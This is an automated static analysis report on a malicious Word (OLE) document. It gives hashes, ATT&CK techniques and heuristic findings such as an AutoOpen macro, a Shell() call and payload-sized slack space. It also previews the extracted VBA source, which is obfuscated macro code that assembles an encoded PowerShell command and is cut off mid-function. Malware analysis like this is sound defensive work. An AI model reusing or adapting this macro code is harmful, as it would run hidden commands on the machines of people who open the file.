Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 915c4395dd91dee8…

MALICIOUS

Office (OLE)

147.0 KB Created: 2018-06-22 11:38:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 1abe3aadcd9dadbd4984124e9c1be915 SHA-1: bd706ec62ba2a9fefe85f2cdf3f74f0a81f850f5 SHA-256: 915c4395dd91dee81b742dc0aa31b9c3a3160ab491c7cf93717ecd8add9da09f
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The presence of a Shell() call within the VBA code suggests that the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. The large slack space in the OLE structure is also a common evasion technique.

Heuristics 6

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 150,528 bytes but its declared streams total only 35,038 bytes — 115,490 bytes (77%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29096 bytes
SHA-256: 4e6a8019c24bb5919b1c33186abd7ce56f1276873c53351e0cd473fc5f33865c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "HmCNbzNhIiW"
Function qAHwXkaRw()
On Error Resume Next
pwXJGz = (zRQCj * 74759 + 18002 * CInt(XqWbpl - CDbl(8601)) * 63195 * Oct(7362))
CwioM = "Hel" + "l  " + ".(" + " $" + "veR" + "bo" + "SE"
CClRKL = (MMRCLc * 5034 + 57278 * CInt(JTzvk - CDbl(37345)) * 23569 * Oct(44913))
ENlqEBiIw = "pr" + "EF" + "er" + "eN"
ZKnlsk = (TYDzo * 66552 + 13824 * CInt(FXZrt - CDbl(22267)) * 26245 * Oct(39199))
sUkbTR = "Ce." + "tO" + "sTR"
cckjIA = (qNlkAJ * 50919 + 38992 * CInt(krDwjZ - CDbl(51941)) * 24348 * Oct(83927))
SPXzAPIl = "inG" + "()" + "[1," + "3]+"
qAHwXkaRw = CwioM + ENlqEBiIw + sUkbTR + SPXzAPIl
NtUdUM = (pJQzhL * 47611 + 39353 * CInt(awWEv - CDbl(94459)) * 10823 * Oct(21158))
End Function
Function OknAlmWFT()
On Error Resume Next
TJVRD = (XsRmp * 42554 + 68655 * CInt(XKTRD - CDbl(63272)) * 6392 * Oct(62094))
MfmJiLHVvrJ = "'x" + "'-" + "jOI" + "n'" + "')(" + " [" + "st"
iawipm = (QnJVAC * 40141 + 47523 * CInt(Ocptl - CDbl(59102)) * 70156 * Oct(82232))
NsEmWXSqjXr = "RI" + "ng" + "]:"
wucjBi = (nfrrE * 44654 + 65963 * CInt(XWBMO - CDbl(33351)) * 41892 * Oct(79393))
NzlBR = ":J" + "Oin" + "( '" + "' " + ", (" + " '3"
KoENmt = (pHwqsS * 69191 + 73467 * CInt(QNXdhB - CDbl(84168)) * 87907 * Oct(69196))
LrjwdKTsdsz = "7M9" + "8s6" + "6U" + "99"
PcXcN = (FhVMZr * 1630 + 73146 * CInt(BwYrNE - CDbl(74661)) * 30070 * Oct(64376))
PvZkfV = "P10" + "9k" + "96s" + "33" + "M6" + "0_3"
EwLNJz = (dPdWR * 60033 + 71467 * CInt(mlOZG - CDbl(48707)) * 23408 * Oct(71377))
zOCHzFH = "3t" + "11" + "1e" + "100" + "e1" + "18M" + "44_"
OknAlmWFT = MfmJiLHVvrJ + NsEmWXSqjXr + NzlBR + LrjwdKTsdsz + PvZkfV + zOCHzFH
jETCWS = (NqfJit * 37971 + 22353 * CInt(ONkIU - CDbl(68540)) * 33935 * Oct(75150))
End Function
Function RuUhMFatIX()
On Error Resume Next
aSYqbY = (NYhFdJ * 14043 + 95555 * CInt(JbAbi - CDbl(85932)) * 34447 * Oct(6128))
IwAiqcjph = "110" + "k9" + "9U" + "10" + "7s" + "10" + "0s9"
sMbdS = (mjXvzE * 44400 + 28557 * CInt(RRVmG - CDbl(72897)) * 9507 * Oct(11449))
hibCVnVA = "8e" + "117" + "_3" + "3s1" + "15" + "e96" + "_1"
GKIRLv = (AUjjMQ * 70158 + 13321 * CInt(SzlLwz - CDbl(73980)) * 24534 * Oct(87304))
fCpzrWwFUS = "11M" + "10" + "1_1" + "10k" + "10" + "8t5"
RXfwX = (GnWHoV * 40473 + 55086 * CInt(wjqfu - CDbl(758)) * 62661 * Oct(27154))
GOPfL = "8k" + "37_" + "87>" + "71"
ooTup = (YvYBd * 19943 + 41359 * CInt(IwGcN - CDbl(99744)) * 92795 * Oct(93817))
lmYrRFBD = "U1" + "16" + "U7" + "0M" + "96M"
IzzOvh = (JlJdIj * 37159 + 22196 * CInt(NitzTz - CDbl(6846)) * 55878 * Oct(21484))
PIVjA = "33t" + "60" + "_33" + "P1" + "11c"
joXSOF = (MLzpuc * 26928 + 48556 * CInt(sArQYc - CDbl(89496)) * 57803 * Oct(186))
jrcHRcV = "10" + "0s1" + "18" + "t44" + ">1"
RuUhMFatIX = IwAiqcjph + hibCVnVA + fCpzrWwFUS + GOPfL + lmYrRFBD + PIVjA + jrcHRcV
DzIJt = (CNwKm * 35547 + 90911 * CInt(QWIOJ - CDbl(36313)) * 11064 * Oct(59941))
End Function
Function HXqoFjPtPRH()
On Error Resume Next
cGClv = (GttSw * 4830 + 84895 * CInt(BDSrP - CDbl(30599)) * 28671 * Oct(8793))
vTOqz = "10P" + "99e" + "10" + "7_"
FUzCU = (UhLXbf * 4594 + 83020 * CInt(HDrQtz - CDbl(96758)) * 41178 * Oct(47001))
CWJdjIf = "10" + "0P9" + "8t1" + "17P" + "33" + "t8"
GLqaq = (JYhzQ * 91721 + 14054 * CInt(NYlliQ - CDbl(48129)) * 99073 * Oct(23258))
IufhKwiscQj = "2U" + "120" + "M1"
kMYwLZ = (wbjOV * 56582 + 12105 * CInt(ISHVu - CDbl(39614)) * 23196 * Oct(92836))
npjoC = "14" + "P11" + "7M" + "10" + "0P"
CUOMq = (tGzJq * 57556 + 83098 * CInt(MHpSU - CDbl(45111)) * 43510 * Oct(86148))
YInRvC = "10" + "8t4" + "7c" + "79c" + "100" + "k11"
HXqoFjPtPRH = vTOqz + CWJdjIf + IufhKwiscQj + npjoC + YInRvC
fPVwRi = (MYPRv * 82800 + 22212 * CInt(HTqIVT - CDbl(29959)) * 83779 * Oct(33558))
End Function
Function lkKsdIBWO()
On Error Resume Next
uNECr = (jJYjw * 40172 + 17719 * CInt(cjzSOZ - CDbl(28283)) * 42070 * Oct(91820))
ISfjH = "7>4" + "7U8" + "6e1" + "00M"
KBjOWc = (YEqXQ * 26789 + 19613 * CInt(rhmScz - CDbl(74915)) * 19418 * Oct(29031))
cqEcYzWXus = "99k" + "66" + "_10"
oWzdrs = (SIrpr * 41043 + 74920 * CInt(TYQSDL - C
... (truncated)